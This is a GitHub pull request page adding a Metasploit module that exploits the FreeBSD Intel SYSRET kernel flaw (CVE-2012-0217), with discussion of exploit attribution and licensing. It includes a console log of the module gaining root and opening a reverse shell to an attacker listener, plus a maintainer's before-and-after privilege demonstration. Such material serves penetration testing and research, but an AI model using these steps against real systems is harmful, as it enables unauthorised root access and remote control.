Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation module #11092

Merged
merged 5 commits into from Mar 7, 2019

Conversation

Projects
None yet
7 participants
@bcoles
Copy link
Contributor

bcoles commented Dec 9, 2018

Add FreeBSD 9 Intel SYSRET Privilege Escalation module.

Lazy wrapper for CurcolHekerLink's iZsh's exploit. I realize we already have the mmap exploit, which covers FreeBSD 9.0 and 9.1, but it's nice to have options.

The payload isn't strictly required. The exploit upgrades the privileges of the current task, and by the time the payload executes we're already root. Given that there's no Meterpreter for BSD, this should never be a problem.

  msf5 > use exploit/freebsd/local/intel_sysret_priv_esc 
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1
  session => 1
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188
  lhost => 123.123.123.188
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run
  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 123.123.123.188:4444 
  [+] FreeBSD version 9.0-RELEASE appears vulnerable
  [+] System architecture amd64 is supported
  [+] hw.model: Intel(R) Core(TM) i9-1337 CPU @ 9.99GHz is vulnerable
  [*] Writing '/tmp/.mTaR4rAPd.c' (4781 bytes) ...
  [*] Max line length is 131073
  [*] Writing 4781 bytes in 1 chunks of 17475 bytes (octal-encoded), using printf
  [*] Writing '/tmp/.LBGkIVh' (218 bytes) ...
  [*] Max line length is 131073
  [*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
  [*] Launching exploit...
  [*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
  [*] 
  [*] [*] Retrieving host information...
  [*]     [+] CPU: GenuineIntel
  [*]     [+] sysname: FreeBSD
  [*]     [+] release: 9.0-RELEASE
  [*]     [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
  [*]     [+] machine: amd64
  [*] [*] Validating target OS and version...
  [*]     [+] Vulnerable :-)
  [*] [*] Resolving kernel addresses...
  [*]     [+] Resolved Xofl to 0xffffffff80b02e70
  [*]     [+] Resolved Xbnd to 0xffffffff80b02ea0
  [*]     [+] Resolved Xill to 0xffffffff80b02ed0
  [*]     [+] Resolved Xdna to 0xffffffff80b02f00
  [*]     [+] Resolved Xpage to 0xffffffff80b03240
  [*]     [+] Resolved Xfpu to 0xffffffff80b02fc0
  [*]     [+] Resolved Xalign to 0xffffffff80b03080
  [*]     [+] Resolved Xmchk to 0xffffffff80b02f60
  [*]     [+] Resolved Xxmm to 0xffffffff80b02ff0
  [*] [*] Setup...
  [*]     [+] Trigger code...
  [*]     [+] Trampoline code...
  [*] [*] Fire in the hole!
  [*] [*] Got root!
  [+] Success! Executing payload...
  [*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
  [+] Deleted /tmp/.mTaR4rAPd.c
  [+] Deleted /tmp/.mTaR4rAPd
  [+] Deleted /tmp/.LBGkIVh
  id
  uid=0(root) gid=0(wheel) groups=0(wheel)
  uname -a
  FreeBSD freebsd-9-0 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
Show resolved Hide resolved data/exploits/cve-2012-0217/sysret.c Outdated
Show resolved Hide resolved data/exploits/cve-2012-0217/sysret.c Outdated
Show resolved Hide resolved data/exploits/cve-2012-0217/sysret.c Outdated

@bcoles bcoles added docs and removed needs-docs labels Dec 9, 2018

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

jmartin-r7 commented Dec 11, 2018

@msjenkins-r7 test this please.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Dec 13, 2018

Closer inspection reveals this exploit was likely stolen from @iZsh from fail0verflow. CurcolHekerLink's exploit was posted to EDB in 2013. iZsh's exploit and accompanying analysis is very similar and predates the exploit by about a year:

The original blog publish date is 2012-07-05. The Web Archive page does not have a backup from this date, but the YouTube video confirms the date, as does the commit date on GitHub.

Unfortunately, the exploit is not licensed, and the copyright infringement punishment is undesirable:

// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.

I would prefer to use the original work. I've updated the module in my local repo, and asked iZsh for permission to use the original exploit. Adding delayed tag for now.

@bcoles bcoles added the delayed label Dec 13, 2018

@bcoles bcoles added attic and removed delayed labels Dec 21, 2018

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Dec 21, 2018

Adding attic tag pending approval from @iZsh.

@bcoles bcoles closed this Dec 21, 2018

@iZsh

This comment has been minimized.

Copy link

iZsh commented Jan 11, 2019

Sorry, i hadn't noticed your email. Your fear of my license punishment made my day ;-)

You have my approval to use my exploit in metasploit.

@bcoles bcoles reopened this Jan 11, 2019

@bcoles bcoles removed the attic label Jan 11, 2019

@bcoles bcoles changed the title Add FreeBSD 9 Intel SYSRET Privilege Escalation module Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation module Jan 11, 2019

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jan 11, 2019

This is the best!

@busterb busterb self-assigned this Mar 7, 2019

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Mar 7, 2019

Darn it, I started checking this earlier, verified it works, but got distracted before landing. Moving forward with that now. Thanks @bcoles

@busterb busterb merged commit 983b39a into rapid7:master Mar 7, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Mar 7, 2019

msjenkins-r7 added a commit that referenced this pull request Mar 7, 2019

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Mar 7, 2019

Release Notes

The freebsd/local/intel_sysret_priv_esc exploit module has been added to the framework. This local privilege escalation exploit module targets a vulnerability in the FreeBSD kernel when running on 64-bit Intel processors, leveraging a mishandled edge cases with the SYSRET instruction.

@bcoles bcoles deleted the bcoles:intel_sysret_priv_esc branch Mar 7, 2019

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Mar 12, 2019

And just as a verification that this does indeed upgrade the privileges of the current task, here's before and after running bsd/x64/shell_reverse_tcp

%whoami
vagrant
%/tmp/test.elf 
^C
%whoami
root
%
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.